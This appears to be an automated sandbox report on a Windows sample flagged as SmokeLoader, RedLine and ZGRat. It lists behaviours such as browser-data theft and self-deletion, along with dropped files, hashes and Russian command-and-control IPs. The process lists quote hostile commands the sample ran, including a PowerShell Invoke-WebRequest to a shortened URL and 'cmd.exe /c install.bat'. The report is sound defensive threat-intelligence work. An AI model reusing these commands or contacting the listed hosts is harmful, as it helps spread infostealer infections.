Malware Analysis Report

2025-03-15 05:17

Sample ID 231218-1jq79sdedj
Target b6495a9c6a890740db6f41bf37af8427.exe
SHA256 816640f101b9440dc8892bf84720ac50afe8fe11888574fa8b81af8caae19aa7
Tags
smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat discovery rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

816640f101b9440dc8892bf84720ac50afe8fe11888574fa8b81af8caae19aa7

Threat Level: Known bad

The file b6495a9c6a890740db6f41bf37af8427.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat discovery rat spyware stealer

Smokeloader family

RedLine payload

SmokeLoader

RedLine

ZGRat

Detect ZGRat V1

Downloads MZ/PE file

Reads user/profile data of web browsers

Deletes itself

Executes dropped EXE

Looks up external IP address via web service

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 21:41

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 21:41

Reported

2023-12-18 21:43

Platform

win7-20231215-en

Max time kernel

32s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9F3C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BCAC.exe N/A

Legitimate hosting services abused for malware hosting/C2

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1224 wrote to memory of 2748 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F3C.exe
PID 1224 wrote to memory of 2748 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F3C.exe
PID 1224 wrote to memory of 2748 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F3C.exe
PID 1224 wrote to memory of 2748 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F3C.exe
PID 1224 wrote to memory of 1132 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCAC.exe
PID 1224 wrote to memory of 1132 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCAC.exe
PID 1224 wrote to memory of 1132 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCAC.exe
PID 1224 wrote to memory of 1132 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCAC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Users\Admin\AppData\Local\Temp\BCAC.exe

C:\Users\Admin\AppData\Local\Temp\BCAC.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\C42B.exe

C:\Users\Admin\AppData\Local\Temp\C42B.exe

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.4:443 github.com tcp

Files

memory/2116-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1224-1-0x0000000002A70000-0x0000000002A86000-memory.dmp

memory/2116-2-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/2748-14-0x0000000000070000-0x00000000000C2000-memory.dmp

memory/2748-19-0x00000000746F0000-0x0000000074DDE000-memory.dmp

memory/2748-20-0x0000000004EE0000-0x0000000004F20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BCAC.exe

MD5 84b4c85403bffecab937304c9d573b48
SHA1 c48b9869a7e23404f03e4dc71a9b71bed6ab13af
SHA256 ffea787728ca6bafb77b18594bfe874df805c831e8c8b75ac6f6f7c07006c779
SHA512 1aac5b1dc41c6c11202e4c3d01e75c23b1b42840c58b5b2d06f97f120eccfac22ef4a094bb40b40eed8c760953c3f65062822044a839dc4e799c903ad778c450

C:\Users\Admin\AppData\Local\Temp\BCAC.exe

MD5 737f53f4f92e09a7f0f34f148f183ce6
SHA1 d45ee97385e4e9b56280cece2e3e4b44c16365eb
SHA256 5c98f1f5db4552849ed6b57954b4e50b7a400c2b2b53aea88b8b6e5b8c0956d4
SHA512 6852c2ffa85ddb84f533f93b6a90c23bf953d467ffceca727ec0efdc6925a4df6936f0701575b278529fc3cce68c6b36271e62b99fb2b75319155aa14f4ce13c

memory/1132-28-0x0000000000C50000-0x0000000001A42000-memory.dmp

memory/1132-27-0x00000000746F0000-0x0000000074DDE000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 c6c53c63657293e4da62c4e7f1d1831b
SHA1 a8379d445fb2226da97418f4d75bad07ef9290ca
SHA256 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf
SHA512 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 e0b201d9da0623b03d1de1b63457e7b0
SHA1 60f1a5148b2f479efc51547e210a2ae583305b71
SHA256 18b641a8d75f26adb52148ff99a69a790e061d130924f62c08ffcedbadf87571
SHA512 c118ec59658286d35f00e9f49ec21f1c5508c77ca7ada4d81e40b0ed221bfb4722bb18c1e95a72bdde95af8323bb70bd6bc9a6e3bfad37ce2f33fcd0a0b048ea

\Users\Admin\AppData\Local\Temp\nsyC14D.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 34bef646227f2775362fe50d123475d1
SHA1 f78e12e38a411e26243207d800b61d32b8029fba
SHA256 c3c0ec5c217be5a1fef4b292ff119f13458df9e4a5239e451e425ff7037f0854
SHA512 19542be3baf6f83410c7373ee789cca059d4ad3087b40973264591edfe243ef63eec50b5beb50edf85b0e5c9854d502dcd0faeb6ca54533f9b2857f0553778d2

memory/1716-63-0x0000000000CB0000-0x0000000000DB0000-memory.dmp

memory/1716-65-0x0000000000220000-0x0000000000229000-memory.dmp

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 ef5c40551f24ee54634f28b4c8dc527f
SHA1 948264c50413b81a1cfdda208f6880614f74d050
SHA256 b32dd75ef77463c3b9b4c1a9598b51bbef486804a96cc2a1282ffb7f6c1a14b8
SHA512 c4369fd9c8b56e7a14374b5608baadc346eeac32b7192da95dbb6ec724a2bb45e2b362e5be65a0cca62ca6374d74ca271b7a5bad4366beb64370a18dc1b27522

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2844-61-0x0000000002520000-0x0000000002918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 0277dcbf0f270408ad6da03d0bc91b9a
SHA1 01fe1f3b96c9f4e64217c5437cfc0e0a73e234a7
SHA256 e19b0f1aa5c0f5ca4a97c996decb300e75a268c055715ae9e2fc6617a9441aaf
SHA512 7d089bda969c4d3a1c0f0939b9e1846e1e4e272897ee2c9399bfc92bf76d82afe471e3e61c744a0022fea04b60e803dc4a0a02b12f689899b773b8bd14540263

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 21:41

Reported

2023-12-18 21:43

Platform

win10v2004-20231215-en

Max time kernel

45s

Max time network

85s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B882.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B1.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 3756 N/A N/A C:\Users\Admin\AppData\Local\Temp\B882.exe
PID 3492 wrote to memory of 3756 N/A N/A C:\Users\Admin\AppData\Local\Temp\B882.exe
PID 3492 wrote to memory of 3756 N/A N/A C:\Users\Admin\AppData\Local\Temp\B882.exe
PID 3492 wrote to memory of 4324 N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B1.exe
PID 3492 wrote to memory of 4324 N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B1.exe
PID 3492 wrote to memory of 4324 N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B1.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

C:\Users\Admin\AppData\Local\Temp\B882.exe

C:\Users\Admin\AppData\Local\Temp\B882.exe

C:\Users\Admin\AppData\Local\Temp\E7B1.exe

C:\Users\Admin\AppData\Local\Temp\E7B1.exe

C:\Users\Admin\AppData\Local\Temp\51E.exe

C:\Users\Admin\AppData\Local\Temp\51E.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\B39.exe

C:\Users\Admin\AppData\Local\Temp\B39.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp" /SL5="$B0046,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\11C2.exe

C:\Users\Admin\AppData\Local\Temp\11C2.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.29.78:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 78.29.5.3.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 87.132.105.77.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
RU 5.42.65.125:80 5.42.65.125 tcp
US 8.8.8.8:53 125.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:80 api.ipify.org tcp

Files

memory/2472-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3492-1-0x00000000012B0000-0x00000000012C6000-memory.dmp

memory/2472-2-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B882.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/3756-12-0x0000000000960000-0x00000000009B2000-memory.dmp

memory/3756-17-0x0000000074430000-0x0000000074BE0000-memory.dmp

memory/3756-18-0x0000000005510000-0x0000000005AB4000-memory.dmp

memory/3756-19-0x0000000004F60000-0x0000000004FF2000-memory.dmp

memory/3756-20-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/3756-21-0x0000000005000000-0x000000000500A000-memory.dmp

memory/3756-23-0x0000000006570000-0x0000000006B88000-memory.dmp

memory/3756-24-0x0000000007DF0000-0x0000000007EFA000-memory.dmp

memory/3756-25-0x0000000006430000-0x0000000006442000-memory.dmp

memory/3756-26-0x0000000006490000-0x00000000064CC000-memory.dmp

memory/3756-27-0x00000000064E0000-0x000000000652C000-memory.dmp

memory/3756-28-0x0000000008A00000-0x0000000008A66000-memory.dmp

memory/3756-29-0x0000000008E80000-0x0000000009042000-memory.dmp

memory/3756-30-0x0000000009580000-0x0000000009AAC000-memory.dmp

memory/3756-31-0x0000000009350000-0x00000000093A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E7B1.exe

MD5 8c398916da35973575f7d1fdf63c19aa
SHA1 0641014a47b569501ae6e65529be01f80e688372
SHA256 3c8f22c1e1207b518e7791dc127e870f77a16a1f24368207c1e35317aeaaba51
SHA512 c61d30da6fd8ab32e318d46498e5f323a0c7ec28571823ee73f7e1a616d76d61bd596d54eb2d827fa7013f42098498a5f50a0dbd82e4a82c987c56605903bd61

C:\Users\Admin\AppData\Local\Temp\E7B1.exe

MD5 392e6b16fd27eea926bdc519dd60039f
SHA1 c84a63d916a7a32cf730948cfc343f0f7164feac
SHA256 8903f680d8a7235392f30dc0431afddab1079022998f59d32e25bf53de0017f9
SHA512 52aba1d3a9b0fd9757a63dcaa33bad4f8d522f915760cc298301830362f01fe7d1a1e93de5d268e2ee9e5bfeaf18ab413a628022f0144a26ee60524b1a5be39b

memory/4324-36-0x0000000000490000-0x000000000092E000-memory.dmp

memory/4324-37-0x0000000074430000-0x0000000074BE0000-memory.dmp

memory/4324-38-0x0000000005440000-0x00000000054DC000-memory.dmp

memory/3756-39-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/4324-40-0x00000000051B0000-0x00000000051C0000-memory.dmp

memory/3756-41-0x0000000074430000-0x0000000074BE0000-memory.dmp

memory/3756-44-0x0000000074430000-0x0000000074BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\51E.exe

MD5 20001f7ce3121bb0568d0cfccae0bf29
SHA1 3e356cec23414ca8e3486061c082144abcb289ea
SHA256 e73b88a9d1498de5bbbfb51eb38b2a5e7ad3feb6e91eca26736a1231a06c00a3
SHA512 ea1c75ab95f65e1161412806c03a10e2b6077cc4c021d374c3acdac6ed49234a1343fdc89b8933de4055d993115ca05c11528afde100def466b9a15f8f24c8ab

C:\Users\Admin\AppData\Local\Temp\51E.exe

MD5 cdc204df6178375cbae23944694f7344
SHA1 e1a8a6af97555a6650c9938ddaa6c4b4600b1c56
SHA256 82e86d18e1661b00257323a70342c10419d17b0cfcb9487839fa01b22efb4696
SHA512 af0a71a252878d8abf11572b36ff6b4f10133f0b71541052e24fa49e5d97a7775097cd1288eb95b685b11d250465499bb8d3996a84bd38471650f4a86c6d3b44

memory/2468-49-0x0000000074430000-0x0000000074BE0000-memory.dmp

memory/2468-50-0x00000000000E0000-0x0000000000ED2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 5d435f239104f6f4b8aca494cd0f7b2c
SHA1 a47880df254ca60a6f86a42d05092822ab43901c
SHA256 c65861276001677cf4f352b2774e4699991badb4c021a7f5ffef6cb6aa8d1b02
SHA512 29f9c693cfb7ae4372092657e3c7aa3b539ccee1fdffa8d4980318542d5682c53aa245d2fb8f2373b911121aa06993197c35bde98da82005365ce68b0696675d

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 55d93c3181333967be8c57f52c1d8a49
SHA1 f61045bb727f119c84a618e8d19a1fbc9b63a046
SHA256 2d95ca85f881a9388f852a9243fd4a348359516d1aada5dd198c27d5146653e1
SHA512 486da6f2eb92e0c408786af64cedd1c054fad29234e9afcd40fa384fdb7fc41ebc9e583e1713a0cf8eb50a67cc2291eff7fd235948b34915087f843eaefa17de

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 56884a24495c3709f6348829212ca5d3
SHA1 c3a0cf0dbae97755bcb7aa6de47dee8438b217ee
SHA256 9781722258e5fc13f63481f7bf25ecdff3a961e44b9f405191528045395fd368
SHA512 063a91888ffd0f121977250f91b195f257750f19e5e81629f53f111df9eaba719143c781e5dacb843b6b4e8087e68e4f72952f46033a4cb7c4a3319f2730306c

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 507f2fbbe42ccef8e74e66a6c1400c93
SHA1 d6a5a1ac5f7679153489cc54ddfaf2a98c4c30c6
SHA256 21ba4e176cef88d3f12e971bf5f32f332a5857b571019e4d3667a9b85247ec4e
SHA512 b9c5579e0b745e2b892329f0d078cfa01ccae0c27df87f31850b348da8a7b6c0c9d2a9699359ef392765d1ad43f9e6098e22f101258f80f07debba8e40f5dbe8

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 ed82c8b1405d74966ad67963743bf9e3
SHA1 e1159a02654fbc8be19f55ba9d8331d06bfdf421
SHA256 696d43b65b6c11caa742d73beea9a92d8dfdeab70cec39c1cc08d2e9c89c8d4f
SHA512 b18f5ea58764fa3c42941f46cdbc4f026839fc980735a0fb3bc25e1ace8413a4a188befb1deb27410f2cc273fd1c191f94936cd728f83f7ea56779ad313acb1c

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 96b48180e6b80d7e828e412b6b21576f
SHA1 f130ab71166d8ac5dc5ec1cda56afa2acc8b9e56
SHA256 5b85c1de86c15d1aa29ace1e9653ddec79f27c70c7939294736989cabccaaca1
SHA512 90b58b30e65607f9cf8c3c7e0b418faf6c277eac27283c5e0887d24201214b8f475353f3087f3ba46315d7c3670712b84386d31d44045246dbea9f52410cc113

C:\Users\Admin\AppData\Local\Temp\nsh9D0.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9bd43ccef269e584af59af530c1e0a12
SHA1 c50015b357a4c15546d033fc82f0d757ad638097
SHA256 54aa4a6765bda105aa813b676e484b29188d690e6a4cdf4382285aa39db08b37
SHA512 68c4f251a8f9b05c7e473ea27463dd58957d072dec901ee4b17423f4e2522c90f58aa83e96a76c432c92adb9cf5d13eebb894b27cdf0fa8bd86c42190720201f

